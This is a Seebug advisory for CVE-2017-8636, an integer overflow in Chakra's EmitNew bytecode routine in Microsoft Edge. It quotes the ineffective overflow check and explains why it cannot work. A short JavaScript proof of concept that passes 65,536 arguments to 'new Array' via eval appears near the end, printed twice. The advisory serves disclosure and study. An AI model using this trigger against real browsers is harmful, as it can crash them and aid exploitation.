Microsoft Edge: Chakra: Integer overflow in EmitNew(CVE-2017-8636)

2017-08-17T00:00:00
ID SSV:96362
Type seebug
Reporter nu11
Modified 2017-08-17T00:00:00

Description

The bytecode generator uses the "EmitNew" function to handle new operators. Here's the code how the function checks for integer overflow. ``` void EmitNew(ParseNode pnode, ByteCodeGenerator byteCodeGenerator, FuncInfo* funcInfo) { Js::ArgSlot argCount = pnode->sxCall.argCount; argCount++; // include "this"

BOOL fSideEffectArgs = FALSE;
unsigned int tmpCount = CountArguments(pnode->sxCall.pnodeArgs, &fSideEffectArgs);
Assert(argCount == tmpCount);

if (argCount != (Js::ArgSlot)argCount)
{
    Js::Throw::OutOfMemory();
}
...

} `` "Js::ArgSlot" is a 16 bit unsigned integer type. And "argCount" is of the type "Js::ArgSlot". So "if (argCount != (Js::ArgSlot)argCount)`" has no point. It can't prevent the integer overflow at all.

PoC:

let args = new Array(0x10000); args = args.fill(0x1234).join(', '); eval('new Array(' + args + ')');

                                        
                                            
                                                let args = new Array(0x10000);
args = args.fill(0x1234).join(', ');
eval('new Array(' + args + ')');